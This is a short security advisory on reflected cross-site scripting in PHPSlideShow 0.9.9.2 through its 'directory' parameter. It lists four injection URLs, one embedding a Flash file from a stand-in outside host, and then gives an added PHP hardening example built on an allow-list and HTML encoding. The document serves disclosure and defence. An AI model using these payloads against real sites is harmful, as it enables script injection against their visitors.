From: morin.josh_(at)_gmail.com <morin.josh_(at)_gmail.com>
Date: 29.11.2007
Subject: PHPSlideShow XSS Update

Vendor Site: http://www.zinkwazi.com/wp/scripts/
Version affected: 0.9.9.2
URL: http://www.example.com/scripts/demo/phpslideshow.php?directory=photos
BID ref: 26576
By Jose Luis Góngora Fernández

PHPSlideShow is also susceptible to the following inputs:

1. http://www.yoursite.com/scripts/demo/phpslideshow.php?directory="><iframe>
2. http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=<html><font color="Red"><b>Pwned</b></font></html>
3. http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=<EMBED SRC="http://site.com/xss.swf"
4. http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=FORM%20ACTION=%22search.php%22%20METHOD=%22GET%22%3E

Discovered by: Joshua Morin
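A defender-side hardening pattern for the reflected `directory` parameter, added here as an example and not PHPSlideShow's own code: it assumes a script that echoes `?directory=` back into the page, as the advisory describes, and a `photos/` base directory beside the script (both assumptions). Every one of the inputs listed above fails the allow-list and is reflected only in HTML-encoded form.

```php
<?php
// Added hardening example (not PHPSlideShow's code). Assumption: album
// directories live under photos/ next to this script.
declare(strict_types=1);

const SLIDESHOW_ROOT = __DIR__ . '/photos';

/**
 * Accept only a single, plain directory name and confirm that it resolves to
 * an existing directory inside SLIDESHOW_ROOT. Returns the canonical path,
 * or null when the value is malformed, missing, or escapes the root.
 */
function resolve_album(string $directory): ?string
{
    // One path component: no separators, no dot-segments, no markup characters.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $directory)) {
        return null;
    }
    $root = realpath(SLIDESHOW_ROOT);
    $path = realpath(SLIDESHOW_ROOT . '/' . $directory);
    if ($root === false || $path === false || !is_dir($path)) {
        return null;
    }
    // realpath() resolves symlinks, so still require the result to stay under root.
    $prefix = $root . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

/** HTML-encode anything reflected into the page, whatever its origin. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

$requested = (string) ($_GET['directory'] ?? 'photos');
$album = resolve_album($requested);

header('Content-Type: text/html; charset=UTF-8');
if ($album === null) {
    http_response_code(400);
    // The rejected value is echoed only encoded: "><iframe> renders as literal text.
    echo '<p>Unknown album: ' . h($requested) . '</p>';
    exit;
}
echo '<h1>Album: ' . h(basename($album)) . '</h1>';
```

The allow-list does the real work; the encoding in `h()` is the backstop for any value that still reaches the page, including the fixed default.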